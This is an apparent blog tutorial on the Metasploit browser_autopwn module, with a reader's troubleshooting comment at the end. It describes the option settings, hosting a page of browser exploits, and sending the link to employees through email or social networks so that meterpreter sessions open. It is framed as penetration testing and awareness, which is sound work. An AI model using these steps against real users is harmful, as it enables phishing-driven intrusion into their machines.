In nowadays due to firewall restrictions and patch management policies exploitation of systems has become much more difficult.However one of the most efficient way is the use of client-side attacks.Client side attacks requires the user interaction and in most of the cases can be used through social engineering engagements.An employee which will not have the necessary knowledge to understand the risks of opening untrusted links can help an attacker to exploit any internal systems.Also the fact that browsers are not patched as often as operating systems makes the problem bigger.
In this article we will examine the effectiveness of metasploit browser autopwn module.The basic idea behind that module is that it creates a web server in our local machine which will contain different kind of browser exploits.When the user will open the malicious link then the execution of the exploits will start against the browser of the user and if one of the exploits is successful a meterpreter session will open.
In order to use this attack we have to open the metasploit framework and to use the browser_autopwn module.In the next image you can see the available options and default settings for this module.
We will set up the LHOST with our IP address,the SRVPORT with the port 80 (otherwise the link that we have to send to the user must me in the format IP:8080) and the URIPATH with / in order to prevent metasploit to set up random URL’s.
After the execution of this module we will notice that different exploits for a variety of browsers will start loading to our web server.
Now we can share the link through our email to our client employees.If any user opens the malicious link,the autopwn module will try all these exploits in order to see if it can break into the client.If the browser is vulnerable to any of these exploits meterpreter sessions will open.
Browser based attacks are not stable.This is because browsers can crash which means that the meterpreter session or the shell access will lost.For that reason the metasploit will try to migrate with a another process more stable as soon as possible.
Most of the organizations are behind proxy firewalls so only the port 80 is allowed.From the other hand many employees are using social networks these days for various reasons.An attacker can exploit that and send malicious links through the social networks to users so the use of this attack can be very effective against companies as it contains exploits for most of the popular browsers and it only requires the mistake of one person in order to be successful.Metasploit Browser Autopwn module is the proof of how dangerous is to open links that are coming from untrusted sources.
I tried using the exploit, but when i open the URL in victim PC (VM instance of Win XP SP1 ), in my msfconsole i get the message handling request from 192.168.1.3 (ip of xp) and nothing happens